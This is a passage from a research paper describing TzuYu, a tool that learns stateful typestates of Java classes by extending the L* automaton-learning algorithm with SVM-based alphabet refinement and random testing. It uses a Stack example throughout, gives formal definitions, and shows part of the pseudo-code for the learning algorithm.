must be refined. We collect data states of the stack at state A before calling method pop and partition them into two sets, i.e., the ones which lead to failure after invoking pop and the rest. Next, the refiner is consulted to generate a proposition φ such that all data states in one set satisfy φ while all those in the other violate φ. 
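This partition-then-separate step can be sketched as follows. TzuYu performs the separation with SVMs; here a one-dimensional midpoint threshold stands in for the SVM, which is enough when the relevant data state is a single integer such as eleCount (the function name and the sample data are illustrative):

```python
def learn_guard(failing_states, passing_states):
    """Return a threshold t separating two sets of observed data states,
    assuming max(failing) < min(passing); the guard is then `state >= t`."""
    hi_fail = max(failing_states)   # e.g. eleCount values for which pop failed
    lo_pass = min(passing_states)   # e.g. eleCount values for which pop succeeded
    assert hi_fail < lo_pass, "data states are not separable by a threshold"
    return (hi_fail + lo_pass) / 2.0  # the 1-D analogue of a separating hyperplane

# eleCount observed at state A just before calling pop:
threshold = learn_guard(failing_states=[0], passing_states=[1, 2, 5])
```

A threshold of 0.5 on an integer field then simplifies to the guard eleCount ≥ 1.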
The technique used by the refiner is based on Support Vector Machines (SVMs) [23]. In the above example, the generated proposition is eleCount ≥ 0.5. Next, we re-start the learning process with an alphabet which contains three events: push, [eleCount ≥ 0.5]pop and [eleCount < 0.5]pop, where [g]pop denotes calling pop only when the guard condition g is satisfied. After a series of membership queries, the learner constructs the observation table as shown in Fig. 3 (a). Notice that all tests corresponding to [eleCount ≥ 0.5]pop result in no failure and therefore the entry is marked 1 in the table. A new candidate typestate is then generated from the table, as shown in Fig. 3 (b). The tester performs random walking again and finds no inconsistency. We then present Fig. 3 (b) as the resultant typestate, after some simple bookkeeping which transforms eleCount ≥ 0.5 into eleCount ≥ 1 (using the fact that eleCount is an integer). The novelty of our approach lies in integrating a refiner into the active learning process so as to learn typestates for data-rich programs. In particular, by adopting techniques from the machine learning community, we are able to automatically generate propositions for alphabet refinement. The refiner acts as an abstract mapper between the learner and the class under analysis. Compared with existing techniques for finding the right proposition (e.g., [13]), our approach is more scalable as it avoids SMT/SAT encoding and solving. Furthermore, to learn concise stateful typestates efficiently, we investigate the interplay between learning and refinement and develop an algorithm which avoids re-starting learning when alphabet refinement occurs. The method has been implemented in a tool named TzuYu¹ and our experiments show that TzuYu is able to learn meaningful and concise typestates efficiently. The remainder of the paper is organized as follows. Section II presents a preliminary introduction to the concepts and techniques used in our approach. Section III presents the details of our approach. Section IV presents details on the implementation of TzuYu and Section V evaluates its performance with experiments. 
Section VI discusses related work. Section VII concludes the paper. II. PRELIMINARIES In this section we formalize the definitions related to stateful typestates and introduce the techniques used in our approach. A. Definitions The input to our method is a Java class (e.g., the Stack class) which is constituted by a set of instance variables (which could be objects of other classes) and methods. (¹Who is commonly known as the best student of Confucius.) In this work, we fix one object of the given class as the main receiver and inspect behaviors of all instances of the class through this object. An object state is the status of the object, i.e., the valuation of its variables. For each object, there is an initial object state, i.e., the initial valuation of the variables². A method is a function which takes one object state and returns a new one. A concrete execution ex of an object is a finite sequence \[ ex = (o_0, m_0(\overline{p_0}), o_1, m_1(\overline{p_1}), \ldots, o_k, m_k(\overline{p_k}), o_{k+1}) \] where \(o_i\) is an object state and \(m_i(\overline{p_i})\) is a method call with concrete arguments \(\overline{p_i}\). A failed execution is an execution which results in an exception or assertion failure. A successful execution is one which does not fail. The output of our method is a stateful typestate, which is a variant of the deterministic finite-state automaton. **Definition 1:** A deterministic finite-state automaton (hereafter DFA) is a tuple \(D = (S, \Sigma, \text{init}, \rightarrow, F)\) such that \(S\) is a finite set of states; \(\text{init} \in S\) is an initial state; \(\Sigma\) is an alphabet; \(\rightarrow: S \times \Sigma \rightarrow S\) is a transition function and \(F \subseteq S\) is a set of accepting states. A trace of \(D\) is a sequence \(tr = (s_0, e_0, s_1, \ldots, s_n, e_n, s_{n+1})\) such that \(s_0 = \text{init}\) and \((s_i, e_i, s_{i+1}) \in \rightarrow\) for all \(i\). \(tr\) is accepting if \(s_{n+1} \in F\). 
Otherwise, it is non-accepting. The language of \(D\) is the set of all accepting traces of \(D\). In an abuse of notation, we write \(s \xrightarrow{tr} s'\) to denote that trace \(tr\) from state \(s\) leads to state \(s'\) and write \(tr(s)\) to denote \(s'\). For two traces \(tr_0\) and \(tr_1\), we write \(tr_0 \cdot tr_1\) to denote their concatenation. **Definition 2:** A (stateful) typestate of a Java class is a tuple \(T = (\text{Prop}, \text{Meth}, D)\) such that \(\text{Prop}\) is a set of propositions, which are Boolean expressions over variables in the class; \(\text{Meth}\) is the set of method names in the class; \(D = (S, \Sigma, \text{init}, \rightarrow, F)\) is a DFA such that \(\Sigma \subseteq \text{Prop} \times \text{Meth}\). In the Stack example, a proposition in \(\text{Prop}\) can be constituted by \text{eleCount}, \text{capacity} (inherited from Vector), any data field of \text{elementData} (e.g., \text{elementData.length}), etc. Set \(\text{Meth}\) contains \text{push} and \text{pop}. By definition, typestates are deterministic in this work. Notice that an event in \(\Sigma\) is a pair, i.e., a guard condition \(g\) in \(\text{Prop}\) and a method name \(m\) in \(\text{Meth}\). For brevity, a transition is written as \((s, [g]e, s')\). A typestate abstracts all executions of an object of the class. In particular, a trace \(tr = (s_0, [g_0]e_0, s_1, [g_1]e_1, s_2, \ldots, s_n, [g_n]e_n, s_{n+1})\) is an abstraction of the concrete execution \(ex\) above if they have the same sequence of methods (i.e., \(e_i = m_i\) for all \(i\)) and all the guard conditions are satisfied (i.e., \(g_i\) is satisfied by \(o_i\) and the method arguments \(\overline{p_i}\) for all \(i\)). We denote the set of concrete executions of \(tr\) as \(\text{con}(tr)\). 
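Definition 1 translates almost directly into code. The sketch below is illustrative (not TzuYu's internal API); it also encodes one plausible reading of the first candidate of Fig. 2 (b), in which pop from the accepting state A leads to a non-accepting sink and no guards exist yet:

```python
class DFA:
    """A deterministic finite-state automaton as in Definition 1."""
    def __init__(self, states, alphabet, init, delta, accepting):
        self.states, self.alphabet = states, alphabet
        self.init, self.delta, self.accepting = init, delta, accepting

    def run(self, trace):
        """Return the state reached from init via trace (tr(init) in the text)."""
        s = self.init
        for e in trace:
            s = self.delta[(s, e)]
        return s

    def accepts(self, trace):
        return self.run(trace) in self.accepting

# Assumed shape of the first candidate typestate of Fig. 2 (b):
fig2b = DFA(
    states={"A", "B"}, alphabet={"push", "pop"}, init="A",
    delta={("A", "push"): "A", ("A", "pop"): "B",
           ("B", "push"): "B", ("B", "pop"): "B"},
    accepting={"A"},
)
```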
Given an execution \(ex\) and an alphabet \(\Sigma\), we can obtain the corresponding trace, denoted as \(\text{abs}(ex)\), by testing which proposition in \(\text{Prop}\) is satisfied for every method call in \(ex\). A typestate \(D\) is said to be safe (or sound) if, for every accepting trace \(tr\) of \(D\), every execution in \(\text{con}(tr)\) is successful. It is complete if for every concrete execution \(ex\) of the class, there is an accepting trace \(tr\) such that \(ex \in \text{con}(tr)\). **B. The \(L^*\) Algorithm** The learner extends the original \(L^*\) algorithm [5] with lazy alphabet refinement, which is introduced later in Section III-C. In the following we introduce the original \(L^*\) algorithm. The \(L^*\) algorithm assumes that the system to be learned, \(D\), is in the form of a DFA with a fixed alphabet \(\Sigma\), and learns a DFA with the minimal number of states that accepts the same language as \(D\). During the learning process, the \(L^*\) algorithm interacts with a Minimal Adequate Teacher (teacher for short) by asking two types of queries: membership queries and candidate queries. A membership query asks whether a trace \(tr\) is a trace of \(D\), whereas a candidate query asks whether a DFA \(C\) is equivalent to \(D\), i.e., \(C\) and \(D\) have the same language. During the learning process, the \(L^*\) algorithm stores the membership query results in an observation table \((P, E, T)\) where \(P \subseteq \Sigma^*\) is a set of prefixes; \(E \subseteq \Sigma^*\) is a set of suffixes; and \(T\) is a mapping function such that \(T(tr, tr') = 1\) if \(tr\) is a trace in \(P\) (or a prefix in \(P\) extended with an event in \(\Sigma\)), \(tr'\) is a trace in \(E\), and \(tr \cdot tr'\) is a trace of the system; otherwise, \(T(tr, tr') = 0\). In the observation table, the \(L^*\) algorithm categorizes traces based on the Myhill-Nerode Congruence [15]. 
**Definition 3:** We say two traces \(tr\) and \(tr'\) are equivalent, denoted by \(tr \equiv tr'\), if \(tr \cdot \rho\) is a trace of \(D\) iff \(tr' \cdot \rho\) is a trace of \(D\), for all \(\rho \in \Sigma^*\). Under the equivalence relation, we say \(tr\) and \(tr'\) are representing traces of each other with respect to \(D\), denoted by \(tr = [tr']\) and \(tr' = [tr]\). The \(L^*\) algorithm always tries to make the observation table closed and consistent with membership queries. An observation table is closed if for all \(tr \in P\) and \(e \in \Sigma\), there always exists \(tr' \in P\) such that \(tr \cdot e \equiv tr'\). An observation table is consistent if for every two elements \(tr, tr' \in P\) such that \(tr \equiv tr'\), \((tr \cdot e) \equiv (tr' \cdot e)\) for all \(e \in \Sigma\). If the observation table \((P, E, T)\) is closed and consistent, the \(L^*\) algorithm constructs a corresponding candidate DFA \(C = (S, \Sigma, \text{init}, \rightarrow, F)\) such that - \(S\) contains one state for each trace in \(P\); notice that equivalent traces in \(P\) correspond to the same state; - \(\text{init}\) is the state corresponding to the empty trace \(\epsilon\); - for any state \(s\) in \(S\) which corresponds to a trace \(tr\) and any \(e \in \Sigma\), \((s, e, s') \in \rightarrow\), where \(s'\) is the state for the trace \([tr \cdot e]\) in \(P\); - a state \(s\) is in \(F\) iff the corresponding trace \(tr\) satisfies \(T(tr, \epsilon) = 1\). Subsequently, \(L^*\) raises a candidate query on whether \(C\) is equivalent to the system to be learned. If \(C\) is equivalent to the system, \(C\) is returned as the learning result. Otherwise, the teacher identifies a counterexample, say \(tr\), which is then analyzed to find a witness suffix. A witness suffix is a trace that, when appended to two traces, provides enough evidence for the two traces to be classified into two different equivalence classes under the Myhill-Nerode Congruence. 
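The observation-table bookkeeping above can be sketched as follows (a simplified illustration: equivalence is approximated by comparing table rows, which is how implementations of the algorithm group prefixes into states):

```python
def row(T, tr, E):
    """The row of prefix tr: the vector of T(tr, e) over all suffixes e in E."""
    return tuple(T.get((tr, e), 0) for e in E)

def is_closed(P, E, T, alphabet):
    """Closed: every one-step extension of a prefix has the row of some prefix."""
    rows = {row(T, p, E) for p in P}
    return all(row(T, p + (a,), E) in rows for p in P for a in alphabet)

# Tiny Stack-flavoured example with the single suffix epsilon:
E = ((),)
T = {((), ()): 1,                 # the empty trace succeeds
     (("push",), ()): 1,          # push alone succeeds
     (("pop",), ()): 0,           # pop alone fails
     (("pop", "push"), ()): 0,    # after a failure, everything fails
     (("pop", "pop"), ()): 0}
```

With P = {ε} the table is not closed (the row of ⟨pop⟩ matches no prefix); adding ⟨pop⟩ to P closes it, yielding the two states of a first candidate DFA.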
Let \( tr \) be the concatenation of two traces \( tr_0 \) and \( tr_1 \), i.e., \( tr_0 \cdot tr_1 = tr \). Let \( s \) be the state reached from state \( init \) via trace \( tr_0 \), i.e., \( init \xrightarrow{tr_0} s \). \( tr_1 \) is the witness suffix of \( tr \), denoted by \( WS(tr) \), if \( tr_1 \) distinguishes \( s \) and \( D(tr_0) \), i.e., appending \( tr_1 \) to the two states yields different membership results. Once the witness suffix is obtained, \( L^* \) uses it to refine the candidate DFA \( C \) until \( C \) is equivalent to the system. Angluin [5] proved that as long as the unknown language \( U \) is regular, the \( L^* \) algorithm learns an equivalent minimal DFA with at most \( n - 1 \) candidate queries and \( O(mn^2) \) membership queries, where \( m \) is the length of the longest counterexample returned by the teacher and \( n \) is the number of states of the minimal DFA. **Example 1**: We again use the Stack example to illustrate how \( L^* \) works, and also why it does not work when the target class cannot be captured by a DFA. After a series of membership queries, \( L^* \) constructs the first candidate DFA, as shown in Fig. 2 (b), and performs a candidate query for the DFA. The teacher answers “no” with a positive counterexample \((push, pop)\), which should be included in the behavior of the candidate. After analyzing the counterexample, the witness suffix \((pop)\) is added into the set of suffixes \( E \) of the observation table, and the closed observation table is shown in Fig. 4 (a). Based on the observation table, \( L^* \) constructs the second candidate DFA, as shown in Fig. 4 (b), and performs a candidate query for the candidate. The teacher answers “no” again with another positive counterexample \((push, push, pop, pop)\). This time, the witness suffix \((pop, pop)\) is added into the set of suffixes \( E \) of the observation table, and the closed observation table is shown in Fig. 5 (a). 
Based on the observation table, \( L^* \) constructs the third candidate DFA, as shown in Fig. 5 (b), and performs a candidate query for the third one. The reader may find that after the \( i \)-th candidate query for \( i \in \mathbb{N} \), there is always a witness suffix \((pop)^i\) showing that the candidate DFA is incorrect, and one additional state will be added to the candidate DFA, which makes the \( L^* \) learning process non-terminating. ## III. Detailed Approach In this section we first introduce the detailed design of the tester and refiner, and then introduce the learner, which interacts with the tester and refiner to learn the typestate. ### A. The Tester The tester acts as the teacher for the \( L^* \) algorithm. Ideally, given a membership query for a trace \( tr \), the teacher should answer either yes or no. Since \( tr \) can be mapped to a set of concrete executions \( con(tr) \), the teacher should answer yes iff all executions in \( con(tr) \) are successful and answer no iff all executions in \( con(tr) \) fail. Similarly, given a candidate query, the tester should answer yes iff the candidate typestate is safe and complete. Having a perfect teacher in our setting is infeasible for two main reasons. Firstly, the set \( con(tr) \) is in general infinite (with different arguments for method calls) and hence checking whether all executions in \( con(tr) \) are successful or not is highly non-trivial. Secondly, it could be that some executions in \( con(tr) \) are successful, whereas others fail. For instance, assume the class given is \( java.util.Vector \) and \( tr \) is \( \langle addAll \rangle \). A concrete execution with a method call \( addAll \) and argument \( null \) results in an exception, whereas a non-null argument results in success. We tackle the former problem by using guided random testing as the teacher, as we discuss below. 
The latter problem is solved by alphabet refinement, as we show in Section III-B. In the following, we show how the tester is used as a teacher for membership queries and candidate queries.

Given a membership query \( tr \) as follows:

\[
tr = \langle s_0, [g_0]m_0, s_1, [g_1]m_1, s_2, \cdots, s_n, [g_n]m_n, s_{n+1} \rangle
\]

the tester’s task is to identify multiple concrete executions of the form \( \langle o_0, m_0(\overline{p_0}), o_1, m_1(\overline{p_1}), \cdots, o_n, m_n(\overline{p_n}), o_{n+1} \rangle \), i.e., to automatically generate the arguments for all method calls such that all guard conditions \( g_i \) are satisfied. This task is in general highly non-trivial and requires techniques like SAT/SMT solving. In the name of scalability, we instead apply testing techniques for argument generation. In particular, the approach of Randoop [20] is adopted. In the following, we briefly introduce the idea and refer readers to [20] for details. Given \( tr \), we generate arguments for every method call one by one in sequence. Given a typed parameter, the idea is to randomly pick a value from a pool of type-compatible values. This pool is composed of a set of pre-defined values (e.g., a random integer for an integer type, \( null \) or an object with the default object state for a user-defined class, etc.) as well as type-compatible objects that have been generated during the testing process. We remark that in order to re-create the same object, we associate each object with the execution which produces the object state. Given one value for each parameter, we then evaluate whether $g_i$ is true or not. If $g_i$ is true, we proceed with the next method call.

There are four possible outcomes of the random testing. If all tests are successful, the answer to the query is yes, i.e., $tr$ should be an accepting trace. If all tests fail, the answer is no, i.e., $tr$ should be a non-accepting trace.
If there are both successful tests and failed tests (for $tr$ or a prefix of $tr$), the tests are passed to the refiner for alphabet refinement, as we show later. Lastly, due to the limitation of random testing (i.e., the price we pay to avoid theorem proving), it is possible that some guard condition $g_i$ is not satisfied by any of the generated arguments. In other words, we fail to find any concrete execution in $con(tr)$. In such a case, we optimistically answer yes so that the resultant typestate is more permissive.

To answer a candidate query with a typestate $C$, we use random walk [16], [8], [7] to generate a suite of test cases. Note that the approach of Randoop [20] is again used. Test cases which are inconsistent with the typestate are collected into two sets: positive counterexamples and negative counterexamples. A positive counterexample is a successful test whose corresponding trace $tr$ is non-accepting. A negative counterexample is a failed test whose corresponding trace $tr$ is accepting. If both sets are empty, we answer the query with a yes, i.e., the typestate is the final output. If either of the two sets is not empty, the typestate is invalid and a counterexample must be presented to the learner. In the original L* algorithm, presenting any of the counterexamples will do. It is, however, more complicated in our setting, as we show below. For each state $s$ in the typestate $C$, we identify the set of executions in the test suite which end at the state, denoted as $E_s$. For each $e \in \Sigma$, we extend each execution in $E_s$ with a method call corresponding to $e$ and obtain a new set denoted as $E_s^e$. If all of the executions result in failure whereas a transition labeled with $e$ from $s$ leads to an accepting state in $C$, the tester reports that $C$ is invalid, picks one execution in $E_s^e$, and presents its corresponding abstract trace as a counterexample.
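The pool-based argument generation described above can be sketched as follows; the class and method names are hypothetical, and a `null` result corresponds to the case where no satisfying argument is found (which the tester answers optimistically with yes):

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
import java.util.function.Predicate;

// Sketch of pool-based random argument generation: draw type-compatible
// candidates and keep the first one satisfying the guard g_i. Names are
// illustrative, not TzuYu's actual API.
public class ArgPool<T> {
    private final List<T> pool = new ArrayList<>();
    private final Random rnd = new Random(42); // fixed seed for reproducibility

    /** Add a pre-defined or previously generated type-compatible value. */
    public void add(T value) { pool.add(value); }

    /** Draw random candidates; return the first one satisfying the guard,
     *  or null if the guard is never met within maxTries draws. */
    public T pickSatisfying(Predicate<T> guard, int maxTries) {
        for (int i = 0; i < maxTries && !pool.isEmpty(); i++) {
            T candidate = pool.get(rnd.nextInt(pool.size()));
            if (guard.test(candidate)) return candidate;
        }
        return null;
    }
}
```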
Similarly, if all of the executions are successful, whereas a transition labeled with $e$ from $s$ leads to a non-accepting state, the tester presents a counterexample. Lastly, if some of the executions in $E_s^e$ result in failure and others result in success, the refiner is consulted to perform alphabet refinement.

### B. The Refiner

There are two different scenarios in which the refiner is consulted. One is with a membership query $tr$ and a set of tests in $con(tr)$ such that for some of the executions (denoted as $T^-$), performing the last method call (with the generated arguments) results in failure, whereas for the rest of the executions (denoted as $T^+$), performing the last call results in success. In this case, alphabet refinement is a must, as all the tests have the same trace $tr$ and therefore cannot be distinguished without alphabet refinement. Given an execution in $T^-$ or $T^+$, we can obtain a data state pair $(o, \overline{P})$ where $o$ is the object state of the main instance prior to the last method call and $\overline{P}$ is the list of arguments of the last method call. Let $O^-$ be the set of all pairs we collect from executions in $T^-$ and $O^+$ be the set of all pairs we collect from executions in $T^+$. Intuitively, there must be something different between $O^-$ and $O^+$ such that $T^-$ fails and $T^+$ succeeds. The refiner’s job is to find a divider, in the form of a proposition, such that $O^-$ and $O^+$ can be distinguished. Formally, a divider for $O^+$ and $O^-$ is a proposition $\phi$ such that every $o \in O^+$ satisfies $\phi$ and no $o' \in O^-$ satisfies $\phi$. From another point of view, there must be some invariant for all object states in $O^+$ (denoted as $inv^+$) and some invariant for all object states in $O^-$ (denoted as $inv^-$) such that $inv^+$ implies $\phi$ and $inv^-$ implies the negation of $\phi$.
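Once object states are abstracted to numerical vectors (as described below), checking the divider property is straightforward. The sketch below (illustrative names, not TzuYu's API) encodes a linear divider \( \Sigma_i c_i x_i > c \) and verifies that it holds on every state in \( O^+ \) and on none in \( O^- \):

```java
// Sketch: a linear divider phi(x) := sum_i coeff[i]*x[i] > threshold, and
// a check of the divider property against two sets of abstracted states.
public class LinearDivider {
    private final double[] coeff;
    private final double threshold;

    public LinearDivider(double[] coeff, double threshold) {
        this.coeff = coeff;
        this.threshold = threshold;
    }

    /** Evaluate phi on one abstracted object state. */
    public boolean satisfies(double[] x) {
        double s = 0;
        for (int i = 0; i < coeff.length; i++) s += coeff[i] * x[i];
        return s > threshold;
    }

    /** A divider holds on every state in oPlus and on no state in oMinus. */
    public boolean separates(double[][] oPlus, double[][] oMinus) {
        for (double[] p : oPlus) if (!satisfies(p)) return false;
        for (double[] m : oMinus) if (satisfies(m)) return false;
        return true;
    }
}
```

For example, with vectors (isNull, eleCount, increment), the divider eleCount ≥ 1 corresponds to the coefficients (0, 1, 0) and a threshold between 0 and 1.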
The refiner in our work is based on techniques developed by the machine learning community, in particular, Support Vector Machines (SVMs) [23]. SVM is a supervised machine learning algorithm for classification and regression analysis. We use its binary classification functionality, which works as follows. Given two sets of data states (say $O^+$ and $O^-$), each data state being a vector of numerical values (e.g., floating-point numbers), it tries to find a separating hyperplane $\Sigma_{i=1}^{n} c_i x_i = c$ such that (1) $\Sigma_{i=1}^{n} c_i p_i > c$ for every positive data state $(p_1, p_2, \ldots, p_n) \in O^+$ and (2) $\Sigma_{i=1}^{n} c_i m_i < c$ for every negative data state $(m_1, m_2, \ldots, m_n) \in O^-$. As long as $O^+$ and $O^-$ are linearly separable, SVM is guaranteed to find a separating hyperplane, even if the invariants $inv^+$ and $inv^-$ may not be linear. Furthermore, there is usually more than one hyperplane separating $O^+$ from $O^-$. In this work, we choose the optimal margin classifier (see the definition in [25]) if possible. This separating hyperplane can be seen as the strongest witness why the two sets of data states are different.

In order to use SVM to generate dividers, each element in $O^+$ or $O^-$ must be cast into a vector of numerical types. In general, there are both numerical type (e.g., int) and categorical type (e.g., String) variables in Java programs. Thus, we need a systematic way of mapping arbitrary object states to numerical values so as to apply SVM techniques. Furthermore, the inverse mapping is also important, in order to feed the SVM results back to the original program. Our approach is to systematically generate a numerical value graph from each object type and apply SVM techniques to values associated with nodes in the graph level-by-level. We illustrate our approach using an example in the following. Fig.
6 shows part of the numerical value graph for type Stack (where many data fields have been omitted for readability). A rectangle (with round corners) represents a categorical type, whereas a circle associated with the type denotes a numerical value which can be extracted from the type. Notice that a categorical type is always associated with a Boolean value which is true iff the object is null. An edge reads as “contains”. For instance, a Stack type contains an object of type “Array” (i.e., elementData), which in turn contains objects of type “Object”. For readability, each edge is labeled with an abbreviated variable name and each node is labeled with the type. To obtain a vector of numerical values from a type, we traverse the graph level-by-level to collect the numerical values associated with each type. In general, the graph could be huge if a type contains many variables. For the purpose of typestate learning, however, it is often sufficient to look at only the top few levels.

In the following, we demonstrate how the graph is used. Assume the last event of the membership query is \( [true]pop \) and the two sets of object states prior to the method call are \( O^+ \) and \( O^- \). Given that the receiver object of the method call is a Stack, the refiner first abstracts \( O^+ \) and \( O^- \) using the level-0 numerical values in the graph, i.e., \( isNull \), \( eleCount \), and \( increment \), where \( increment \) (inherited from the Vector class) is the amount by which the capacity of the vector is automatically incremented when its size becomes greater than its capacity. Next, the refiner tries to generate a divider which separates the abstracted \( O^+ \) from the abstracted \( O^- \).
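The level-0 abstraction just described can be sketched as follows, using a small stand-in class for the Stack fields of Fig. 6 (the real implementation walks arbitrary classes via reflection, which we skip here for brevity):

```java
public class Level0 {
    // Tiny stand-in for the Stack fields in Fig. 6; illustrative only.
    static class MiniStack {
        int elementCount;       // eleCount in the graph
        int capacityIncrement;  // increment, inherited from Vector
    }

    /** Level-0 abstraction of an object state: (isNull, eleCount, increment). */
    public static double[] abstractState(MiniStack s) {
        if (s == null) return new double[]{1, 0, 0}; // isNull = true
        return new double[]{0, s.elementCount, s.capacityIncrement};
    }
}
```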
Assume that \( O^+ \) contains two object states and the abstracted \( O^+ \) is the set \( \{ (0, 1, 1), (0, 2, 1) \} \), where \( (0, 1, 1) \) denotes a Stack object which is not null (i.e., \( 0 \) means that \( isNull \) is false), with \( eleCount \) being 1 and with \( increment \) being 1. Assume that the abstracted \( O^- \) is \( \{ (0, 0, 1), (0, 0, 1) \} \). SVM finds a divider \( receiver.eleCount \geq 1 \). Notice that if there does not exist a linear divider, the refiner refines the abstraction of \( O^+ \) and \( O^- \) by using numerical values from the next level in the graph (i.e., \( isNull \) for \( data \) and \( length \) of \( data \)) and tries again to find a divider. Intuitively, the reason that we look for a divider level-by-level is that the reason why calling the same method leads to different results is more likely related to the values of variables directly defined in the class and less likely nested in its referenced data variables.

The other scenario in which the refiner is consulted is with a candidate query \( C \) and a set of executions which end in the same state in \( C \), where extending the executions with a method call corresponding to an event \( e \) results in failure for some executions and success for others. Similar to the case of a membership query, for each execution we obtain a pair \( (o, \overline{p}) \) where \( o \) is the object state of the main instance prior to the last method call and \( \overline{p} \) is the list of arguments of the last method call. Similarly, we collect two sets of those pairs, \( O^+ \) (from the successful executions) and \( O^- \) (from the failed executions). Afterwards, SVM is invoked to generate a divider for alphabet refinement.

### C. The Learner

The learner drives the learning process and interacts with both the tester and the refiner. It uses an algorithm which extends the \( L^* \) algorithm [5] with lazy alphabet refinement.
In general, a typestate for a program often requires more expressiveness than a DFA, and therefore the \( L^* \) algorithm by itself is not sufficient. We solve this problem by extending the \( L^* \) algorithm with (lazy) alphabet refinement, i.e., by introducing propositions on object states into the alphabet. The details of the extended \( L^* \) algorithm are presented in the following.

1) \( L^* \) with Lazy Alphabet Refinement: When the refiner generates a divider \( \phi \), an event \( e \) (which calls some method under a certain condition) is effectively divided into two: \( [\phi]e \) and \( [\neg \phi]e \). With a modified alphabet, previous learning results are invalidated and therefore learning needs to be re-started. However, re-starting from scratch is costly, as we often need multiple rounds of alphabet refinement. In the following, we show how to extend the \( L^* \) algorithm with lazy alphabet refinement so as to re-use previous learning results as much as possible.

Algorithm 1 shows the pseudo-code of the \( L^* \) algorithm with lazy alphabet refinement, where \( Q_m(tr) \) denotes the membership query of a trace \( tr \) and \( Q_c(D) \) denotes the candidate query of a typestate \( D \). There are two cases in which alphabet refinement takes place: (1) If a membership query triggers the generation of a divider \( \phi \) (lines 5, 15, 31), some event \( e \in \Sigma \) needs to be split into \( [\phi]e \) and \( [\neg \phi]e \), which calls Algorithm 2 to refine the alphabet and update the corresponding results of the membership queries. (2) A candidate query may also trigger the generation of a divider \( \phi \) (line 24). If so, Algorithm 2 is also called to refine the alphabet and update the corresponding results of the membership queries in the observation table. We use the Stack example to illustrate the \( L^* \) algorithm with lazy alphabet refinement.
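The event-splitting step itself amounts to replacing \( e \) in the alphabet by its two guarded copies; a minimal sketch with illustrative names (events are represented as plain strings here):

```java
import java.util.LinkedHashSet;
import java.util.Set;

// Sketch of the alphabet-refinement step: event e is replaced by its two
// guarded refinements [phi]e and [!(phi)]e. Illustrative, not TzuYu's API.
public class AlphabetSplit {
    public static Set<String> refine(Set<String> sigma, String e, String phi) {
        Set<String> refined = new LinkedHashSet<>(sigma);
        refined.remove(e);
        refined.add("[" + phi + "]" + e);
        refined.add("[!(" + phi + ")]" + e);
        return refined;
    }
}
```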
Initially, the alphabet is \( \Sigma = \{ push, pop \} \). After a series of membership queries, Algorithm 1 constructs the first candidate typestate, as shown in Fig. 2 (b), based on the closed and consistent observation table shown in Fig. 2 (a). A candidate query for the first typestate is performed, and the refiner returns a proposition \( eleCount \geq 1 \) for the positive counterexample \( \langle pop \rangle \). The event \( pop \) is split into two events, \( [eleCount \geq 1]pop \) and \( [!(eleCount \geq 1)]pop \), and the \( L^* \) learning process is restarted. Without lazy alphabet refinement, all the membership queries over the new alphabet \( \Sigma' = \{ push, [eleCount \geq 1]pop, [!(eleCount \geq 1)]pop \} \) would have to be queried, as shown in the observation table in Fig. 7. With lazy alphabet refinement, only the membership queries marked with a * symbol in the observation table have to be queried. In this small example, only two membership queries are saved, because the alphabet consists of only two events. In real-world examples, the alphabet is usually large, and the number of membership queries that can be saved is significant. The final typestate learned by Algorithm 1 is shown in Fig. 3 (b).

## IV. TzuYu Implementation

We have implemented our approach in a tool named TzuYu, which comprises more than 20K lines of Java code and can be downloaded from the web site [28]. In this section, we discuss the challenges and remedies in implementing the proposed method.

We first employ reflection to collect relevant information, such as the fields and methods of each class, so as to construct a numerical value graph for each class. The graph of a type depends on those of the referenced types, and hence potentially many types may be referenced.
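As one concrete piece of this reflection step, deriving the initial alphabet from the methods declared in a target class can be sketched as follows (a hypothetical helper, not TzuYu's actual API):

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Set;
import java.util.TreeSet;

// Sketch: the public methods declared directly in the target class form
// the initial alphabet for the learner; inherited methods are excluded.
public class InitialAlphabet {
    public static Set<String> of(Class<?> target) {
        Set<String> sigma = new TreeSet<>();
        for (Method m : target.getDeclaredMethods()) {
            if (Modifier.isPublic(m.getModifiers())) {
                sigma.add(m.getName());
            }
        }
        return sigma;
    }
}
```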
Not all types are useful for the purpose of generating dividers, and therefore we filter out types like Thread and Exception and high-level interfaces such as Serializable. The methods defined in the target class identify the initial alphabet for the learner. Afterwards, the learner starts to generate membership queries and candidate queries according to Algorithm 1. Given a membership query, the tester checks whether the abstract trace is feasible by generating a number (which is configurable) of executions and uses reflection to run them. During the execution, the tester saves the runtime states of the arguments of the trace through instrumentation.

For argument generation, we developed a just-in-time approach, i.e., we generate the required arguments just before executing a method. If a chosen argument fails the guard condition, we choose another argument which can pass the guard condition. If there is no such argument, we generate another set of arguments until the guard condition evaluates to true (or a bound is reached). We skip the algorithm for the just-in-time generation of arguments. Informally, an argument can be obtained from three sources: randomly generated from a set of pre-defined type-compatible values; selected from existing executions that generate type-compatible variables; or selected from type-compatible out-referenced variables generated by the current execution. The above recursive argument creation procedure for constructors may not terminate if a constructor has a parameter of the same type as itself. We set a maximum depth for the recursive constructor calls in such cases, as is done in [17].

Before executing each method call, we store the object states of the receiver and the arguments as an instrumented state. We remark that saving an object state for later usage is not easy in general because its class may not implement the Serializable or Cloneable interface.
We thus implement a mockup mechanism, similar to the standard clone mechanism in Java, to save the runtime object into a mockup object whose tree-like class structure resembles the class structure of the original object. The mechanism differs from the standard clone mechanism in that only the primitive type values of the object are saved; for a reference type field, we construct another mockup object as its saved value. These mockup objects can be used by

---

**Algorithm 1** L* Algorithm with Lazy Alphabet Refinement

1. Let \( P = E = \{()\} \)
2. for \( e \in \Sigma \cup \{()\} \) do
3. Update \( T \) by \( Q_m(e) \)
4. if \( e \) needs to be split then
5. Split(\( \Sigma, e, (P, E, T) \))
6. end if
7. end for
8. while true do
9. while there exists \( tr \cdot \langle e \rangle \) where \( tr \in P \) and \( e \in \Sigma \) such that \( row(tr \cdot \langle e \rangle) \neq row(tr') \) for all \( tr' \in P \) do
10. \( P \leftarrow P \cup \{tr \cdot \langle e \rangle\} \)
11. for \( \sigma \in E \) do
12. \( tr'' \leftarrow tr \cdot \langle e \rangle \cdot \sigma \)
13. Update \( T \) by \( Q_m(tr'') \)
14. if some \( e' \in \Sigma \) needs to be split then
15. Split(\( \Sigma, e', (P, E, T) \))
16. end if
17. end for
18. end while
19. Construct candidate typestate \( D \) from \( (P, E, T) \)
20. if \( Q_c(D) = yes \) then
21. return \( D \)
22. else
23. if some \( e' \in \Sigma \) needs to be split then
24. Split(\( \Sigma, e', (P, E, T) \))
25. end if
